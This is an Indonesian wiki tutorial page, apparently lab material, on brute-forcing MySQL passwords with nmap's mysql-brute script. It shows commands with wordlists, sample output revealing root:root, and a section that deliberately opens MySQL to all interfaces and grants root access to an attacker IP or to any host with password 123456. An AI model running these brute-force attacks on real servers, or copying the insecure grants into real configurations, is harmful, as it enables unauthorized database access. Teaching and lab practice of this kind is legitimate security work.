Difference between revisions of "Nmap: brute force hack mysql password"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
| (4 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
Sumber: https://nmap.org/nsedoc/scripts/mysql-brute.html | Sumber: https://nmap.org/nsedoc/scripts/mysql-brute.html | ||
| + | |||
| + | |||
| + | |||
| + | |||
| + | |||
| Line 33: | Line 38: | ||
nmap --script=mysql-brute <target> | nmap --script=mysql-brute <target> | ||
| − | Nmap -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt 192.168.0.100 | + | Nmap -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt --script-trace 192.168.0.100 |
| − | Nmap -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt,passdb=/root/pass.txt 192.168.0.100 | + | Nmap -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt,passdb=/root/pass.txt --script-trace 192.168.0.100 |
| + | |||
| + | |||
| + | ==Catatan NSE== | ||
| + | |||
| + | Defaut daftar usernames & passwords ada di | ||
| + | |||
| + | /usr/share/nmap/nselib/data | ||
| + | |||
| + | File | ||
| + | |||
| + | usernames.lst | ||
| + | passwords.lst | ||
==Script Output== | ==Script Output== | ||
| Line 42: | Line 59: | ||
| Accounts | | Accounts | ||
| root:root - Valid credentials | | root:root - Valid credentials | ||
| + | |||
| + | |||
| + | ==Buat Hole di MySQL== | ||
| + | |||
| + | Serangan ini hanya bisa di jalankan kalau mysql salah di konfigurasi | ||
| + | |||
| + | * MySQL yang normal hanya binding ke localhost, artinya hanya mereka yang di localhost yang dapat menyerang. | ||
| + | * MySQL di binding ke interface ethernet, atau ke semua interface, caranya | ||
| + | |||
| + | vi /etc/mysql/mysql.conf.d/mysqld.cnf | ||
| + | |||
| + | # bind-address = 127.0.0.1 | ||
| + | bind-address = 0.0.0.0 | ||
| + | max_connections = 1000 | ||
| + | |||
| + | |||
| + | * beri akses root ke IP attacker, atau ke semua IP (asumsi password root=123456) | ||
| + | |||
| + | mysql -u root -p123456 | ||
| + | |||
| + | GRANT ALL ON *.* to root@'123.123.123.123' IDENTIFIED BY 'put-your-password'; | ||
| + | FLUSH PRIVILEGES; | ||
| + | exit | ||
| + | |||
| + | atau | ||
| + | |||
| + | GRANT ALL ON *.* to root@'%' IDENTIFIED BY '123456'; | ||
| + | FLUSH PRIVILEGES; | ||
| + | exit | ||
| + | |||
| + | * cek menggunakan perintah (asumsi password=123456) | ||
| + | |||
| + | mysql -u root -h ip-address-server -p123456 | ||
| + | |||
| + | Akan keluar | ||
| + | |||
| + | Welcome to the MariaDB monitor. Commands end with ; or \g. | ||
| + | Your MySQL connection id is 50069 | ||
| + | Server version: 5.7.11-0ubuntu6 (Ubuntu) | ||
| + | |||
| + | Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others. | ||
| + | |||
| + | Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. | ||
| + | |||
| + | MySQL [(none)]> | ||
==Referensi== | ==Referensi== | ||
* https://nmap.org/nsedoc/scripts/mysql-brute.html | * https://nmap.org/nsedoc/scripts/mysql-brute.html | ||
Latest revision as of 10:08, 2 June 2018
Sumber: https://nmap.org/nsedoc/scripts/mysql-brute.html
File mysql-brute
Script types: portrule Categories: intrusive, brute Download: http://nmap.org/svn/scripts/mysql-brute.nse
User Summary
Lakukan hack pada password MySQL.
Example Usage
isi
user.txt
admin root dll
isi
pass.txt
123456 123456789 dll
nmap --script=mysql-brute <target> Nmap -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt --script-trace 192.168.0.100 Nmap -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/user.txt,passdb=/root/pass.txt --script-trace 192.168.0.100
Catatan NSE
Defaut daftar usernames & passwords ada di
/usr/share/nmap/nselib/data
File
usernames.lst passwords.lst
Script Output
3306/tcp open mysql | mysql-brute: | Accounts | root:root - Valid credentials
Buat Hole di MySQL
Serangan ini hanya bisa di jalankan kalau mysql salah di konfigurasi
- MySQL yang normal hanya binding ke localhost, artinya hanya mereka yang di localhost yang dapat menyerang.
- MySQL di binding ke interface ethernet, atau ke semua interface, caranya
vi /etc/mysql/mysql.conf.d/mysqld.cnf
# bind-address = 127.0.0.1 bind-address = 0.0.0.0 max_connections = 1000
- beri akses root ke IP attacker, atau ke semua IP (asumsi password root=123456)
mysql -u root -p123456 GRANT ALL ON *.* to root@'123.123.123.123' IDENTIFIED BY 'put-your-password'; FLUSH PRIVILEGES; exit
atau
GRANT ALL ON *.* to root@'%' IDENTIFIED BY '123456'; FLUSH PRIVILEGES; exit
- cek menggunakan perintah (asumsi password=123456)
mysql -u root -h ip-address-server -p123456
Akan keluar
Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 50069 Server version: 5.7.11-0ubuntu6 (Ubuntu) Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]>